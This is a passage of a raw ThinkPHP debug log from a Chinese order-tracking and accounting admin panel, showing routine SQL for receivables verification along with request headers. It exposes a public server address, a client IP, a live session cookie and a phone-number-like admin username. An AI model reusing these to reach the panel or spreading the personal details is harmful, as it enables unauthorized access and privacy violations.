`outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '11828' [ RunTime:0.014297s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=200,`price`=7.52,`money`=1504 WHERE `id` = 27814 [ RunTime:0.005139s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountsreceivable` [ RunTime:0.000769s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000315s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (360 , 40 , 53566 , 1513 , 11828 , 27814 , 1 , 2025 , 12 , 14 , '320W-17底壳200个' , 1765702433 , 1504 , 11062765.790661) [ RunTime:0.004973s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000411s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `reced_money` , `yu_money`) VALUES (360 , 40 , 53566 , 1513 , 11828 , 27814 , 1 , 2025 , 12 , 14 , '320W-17底壳200个' , 1765702433 , 1504 , 11061261.790661) [ RunTime:0.004943s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_ladger` [ RunTime:0.000684s ] [ sql ] [ SQL ] SELECT * FROM `ot_ladger` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000311s ] [ sql ] [ SQL ] INSERT INTO `ot_ladger` (`reced_money` , `yu_money` , `rece_id` , `subject_type` , `explain` , `factorymge_id` , `day` , `month` , `year` , `createtime`) VALUES (1504 , 929103.89891708 , 19823 , 5 , '320W-17底壳200个' , 40 , 14 , 12 , 2025 , 1765702433) [ RunTime:0.004809s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=200,`price`=1.68,`money`=336 WHERE `id` = 27815 [ RunTime:0.005975s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000495s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (360 , 40 , 53567 , 944 , 11828 , 27815 , 1 , 2025 , 12 , 14 , '320w-1上盖200个' , 1765702433 , 336 , 11061597.790661) [ RunTime:0.006126s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000400s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `reced_money` , `yu_money`) VALUES (360 , 40 , 53567 , 944 , 11828 , 27815 , 1 , 2025 , 12 , 14 , '320w-1上盖200个' , 1765702433 , 336 , 11061261.790661) [ RunTime:0.004753s ] [ sql ] [ SQL ] SELECT * FROM `ot_ladger` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000305s ] [ sql ] [ SQL ] INSERT INTO `ot_ladger` (`reced_money` , `yu_money` , `rece_id` , `subject_type` , `explain` , `factorymge_id` , `day` , `month` , `year` , `createtime`) VALUES (336 , 929439.89891708 , 19825 , 5 , '320w-1上盖200个' , 40 , 14 , 12 , 2025 , 1765702433) [ RunTime:0.004628s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=3,`price`=16.7,`money`=50.1 WHERE `id` = 27816 [ RunTime:0.004252s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000356s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (360 , 40 , 53568 , 2762 , 11828 , 27816 , 1 , 2025 , 12 , 14 , '2000W底壳3个' , 1765702433 , 50.1 , 11061311.890661) [ RunTime:0.005189s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000387s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `reced_money` , `yu_money`) VALUES (360 , 40 , 53568 , 2762 , 11828 , 27816 , 1 , 2025 , 12 , 14 , '2000W底壳3个' , 1765702433 , 50.1 , 11061261.790661) [ RunTime:0.004428s ] [ sql ] [ SQL ] SELECT * FROM `ot_ladger` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000415s ] [ sql ] [ SQL ] INSERT INTO `ot_ladger` (`reced_money` , `yu_money` , `rece_id` , `subject_type` , `explain` , `factorymge_id` , `day` , `month` , `year` , `createtime`) VALUES (50.1 , 929489.99891708 , 19827 , 5 , '2000W底壳3个' , 40 , 14 , 12 , 2025 , 1765702433) [ RunTime:0.004849s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=3,`price`=2.3,`money`=6.9 WHERE `id` = 27817 [ RunTime:0.005070s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000427s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (360 , 40 , 53569 , 2763 , 11828 , 27817 , 1 , 2025 , 12 , 14 , '2000W盖3个' , 1765702433 , 6.9 , 11061268.690661) [ RunTime:0.004660s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000331s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `reced_money` , `yu_money`) VALUES (360 , 40 , 53569 , 2763 , 11828 , 27817 , 1 , 2025 , 12 , 14 , '2000W盖3个' , 1765702433 , 6.9 , 11061261.790661) [ RunTime:0.006528s ] [ sql ] [ SQL ] SELECT * FROM `ot_ladger` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000293s ] [ sql ] [ SQL ] INSERT INTO `ot_ladger` (`reced_money` , `yu_money` , `rece_id` , `subject_type` , `explain` , `factorymge_id` , `day` , `month` , `year` , `createtime`) VALUES (6.9 , 929496.89891708 , 19829 , 5 , '2000W盖3个' , 40 , 14 , 12 , 2025 , 1765702433) [ RunTime:0.004435s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000715s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('跟单系统 财务管理 校对应收账款 核对' , '{\"dialog\":\"1\",\"kehu_id\":[\"\\u4e2d\\u4f1f\",\"360\"],\"verify_amount\":[\"200\",\"200\",\"3\",\"3\"],\"price\":[\"7.52\",\"1.6800000000\",\"16.7\",\"2.3000000000\"],\"money\":[\"1504\",\"336.0000000000\",\"50.099999999999994\",\"6.9000000000\"],\"explain\":[\"320W-17\\u5e95\\u58f3200\\u4e2a\",\"320w-1\\u4e0a\\u76d6200\\u4e2a\",\"2000W\\u5e95\\u58f33\\u4e2a\",\"2000W\\u76d63\\u4e2a\"],\"shoukuan_status-1\":\"1\",\"shoukuan_status-2\":\"1\",\"shoukuan_status-3\":\"1\",\"shoukuan_status-4\":\"1\",\"ids\":\"11828\"}' , '/admin/financial/verifybill/hedui/ids/11828?dialog=1' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765702433) [ RunTime:0.004933s ] --------------------------------------------------------------- [ 2025-12-14T16:53:53+08:00 ] 106.112.204.117 GET /admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222025-11-14+00%3A00%3A00%22%2C%22end_time%22%3A%222025-12-14+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1765701970987 [ info ] 47.105.33.115:8081/admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222025-11-14+00%3A00%3A00%22%2C%22end_time%22%3A%222025-12-14+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1765701970987 [运行时间:0.254354s][吞吐率:3.93req/s] [内存消耗:5,706.50kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001120s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"start_time":"2025-11-14 00:00:00","end_time":"2025-12-14 23:59:59"}', 'op' => '{"start_time":"=","end_time":"="}', '_' => '1765701970987', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001473s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->index[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000129s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000394s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000675s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000433s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000719s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001042s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001123s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000374s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000674s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000617s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000701s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM ( SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount,count(*) FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE ( outbound.createtime > 1763049600 ) AND ( outbound.createtime <= 1765727999 ) AND `outboundandorder`.`verify_status` = 0 AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC ) `_group_count_` LIMIT 1 [ RunTime:0.022740s ] [ sql ] [ SQL ] SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE `outboundandorder`.`verify_status` = 0 AND ( outbound.createtime > 1763049600 ) AND ( outbound.createtime <= 1765727999 ) AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC LIMIT 0,10 [ RunTime:0.021644s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11827 [ RunTime:0.014280s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11826 [ RunTime:0.014467s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11825 [ RunTime:0.014315s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11824 [ RunTime:0.014221s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11823 [ RunTime:0.014282s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11822 [ RunTime:0.013785s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11821 [ RunTime:0.014841s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11820 [ RunTime:0.016499s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11819 [ RunTime:0.014686s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11814 [ RunTime:0.014047s ] --------------------------------------------------------------- [ 2025-12-14T16:53:54+08:00 ] 106.112.204.117 GET /admin/financial/verifybill/hedui/ids/11827?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11827?dialog=1 [运行时间:0.075850s][吞吐率:13.18req/s] [内存消耗:6,274.70kb] [文件加载:89] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001238s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'ids' => '11827', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001470s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/verifybill/hedui.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'shoukuanStatusList', 8 => 'start_time', 9 => 'end_time', 10 => 'total', 11 => 'outbound', 12 => 'rows', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000107s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000492s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000955s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000427s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000578s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001204s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000801s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000384s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000683s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000837s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000695s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000632s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000750s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` 